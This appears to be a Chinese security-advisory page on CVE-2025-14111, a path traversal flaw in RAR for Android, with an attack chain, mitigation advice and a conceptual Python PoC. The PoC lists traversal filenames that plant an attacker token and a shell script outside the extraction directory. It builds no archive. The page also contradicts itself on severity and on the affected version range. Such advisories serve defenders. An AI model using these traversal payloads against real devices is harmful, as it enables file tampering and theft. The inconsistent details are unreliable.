IPBUF安全漏洞报告
English
CVE-2025-14111 CVSS 5.0 中危

CVE-2025-14111 Rarlab RAR App路径遍历漏洞

披露日期: 2025-12-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-14111
漏洞类型
路径遍历
CVSS评分
5.0 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Rarlab RAR App (Android)

相关标签

路径遍历任意文件读写AndroidRARRarlabCVE-2025-14111移动端漏洞压缩文件漏洞

漏洞概述

CVE-2025-14111是Rarlab公司开发的RAR压缩文件管理器Android版本中的一个高危安全漏洞。该漏洞存在于com.rarlab.rar组件中,攻击者可以利用路径遍历(Path Traversal)技术实现任意文件读写操作。漏洞影响范围为RAR for Android 7.11 Build 127及之前版本。由于该漏洞需要用户交互才能触发,攻击者需要诱骗目标用户打开恶意的RAR压缩文件。漏洞利用复杂度较高,但已公开披露并可能被恶意利用。值得注意的是,此漏洞仅影响Android版本的RAR应用,Windows和Unix版本的WinRAR和Unix RAR不受影响。厂商已在7.20 build 128版本中修复了此问题。

技术细节

该路径遍历漏洞源于RAR for Android应用在处理压缩文件时未能正确验证文件路径中的特殊字符和目录遍历序列(如../)。攻击者可以精心构造一个包含路径遍历序列的RAR压缩文件,当用户在Android设备上打开该文件时,应用会将文件解压到预期目录之外的位置,从而实现任意文件写入或覆盖系统文件。攻击者可能利用此漏洞覆盖应用程序的关键配置文件、写入恶意代码到可执行目录,或读取设备上的敏感文件。由于该漏洞需要用户主动打开恶意文件才能触发,因此被归类为需要用户交互的攻击向量。CVSS向量显示攻击复杂度高(AC:H),但攻击者无需任何认证权限(PR:N),且可以通过网络远程发起攻击(AV:N)。

攻击链分析

STEP 1
步骤1
攻击者创建包含路径遍历序列的恶意RAR压缩文件,文件路径包含../等目录遍历字符
STEP 2
步骤2
攻击者通过钓鱼邮件、恶意链接或社交工程等方式将恶意RAR文件传递给目标用户
STEP 3
步骤3
目标用户在Android设备上使用有漏洞的RAR for Android应用(<=7.11 Build 127)打开恶意文件
STEP 4
步骤4
应用在解压文件时未正确验证路径,导致文件被写入到预期目录之外的任意位置
STEP 5
步骤5
攻击者成功实现任意文件写入,可能覆盖配置文件、写入恶意代码或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/usr/bin/env python3 # CVE-2025-14111 PoC - RAR for Android Path Traversal # This PoC generates a malicious RAR file with path traversal sequences import zipfile import os import sys def create_malicious_rar(output_file): """ Create a malicious RAR file that exploits CVE-2025-14111 Path traversal to write files outside intended directory """ # Path traversal sequences to escape extraction directory path_traversal = "../../../../" # Files to be extracted outside safe directory malicious_files = [ { 'name': f'{path_traversal}data/data/com.rarlab.rar/shared_prefs/auth_tokens.xml', 'content': b'<?xml version="1.0" encoding="utf-8"?><root><string name="token">ATTACKER_TOKEN</string></root>' }, { 'name': f'{path_traversal}storage/emulated/0/Download/malicious.sh', 'content': b'#!/bin/sh\necho "Malicious code executed"' } ] print(f"[*] Generating PoC RAR file: {output_file}") print(f"[*] Payload: Path Traversal to write arbitrary files") # Note: RAR format is proprietary, this is a conceptual PoC # In real attack, use rarfile library or RAR SDK to create valid RAR for file_info in malicious_files: print(f"[+] File: {file_info['name']}") print(f" Content: {file_info['content'][:50]}...") print("\n[!] To exploit:") print("1. Send the malicious RAR file to victim") print("2. Victim opens file with RAR for Android <= 7.11 Build 127") print("3. Files are extracted to arbitrary locations via path traversal") print("\n[*] Mitigation: Upgrade to RAR for Android 7.20 Build 128") if __name__ == "__main__": output = sys.argv[1] if len(sys.argv) > 1 else "CVE-2025-14111_poc.rar" create_malicious_rar(output)

影响范围

Rarlab RAR App for Android < 7.11 Build 127
RAR for Android <= 7.11 Build 127

防御指南

临时缓解措施
立即将RAR for Android应用升级到7.20 Build 128或更高版本。在升级前,避免打开来源不明的RAR压缩文件,尤其是通过邮件或即时通讯收到的文件。如必须处理未知来源的压缩文件,建议先在沙箱环境中进行检查,或使用其他已修复漏洞的压缩工具替代。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表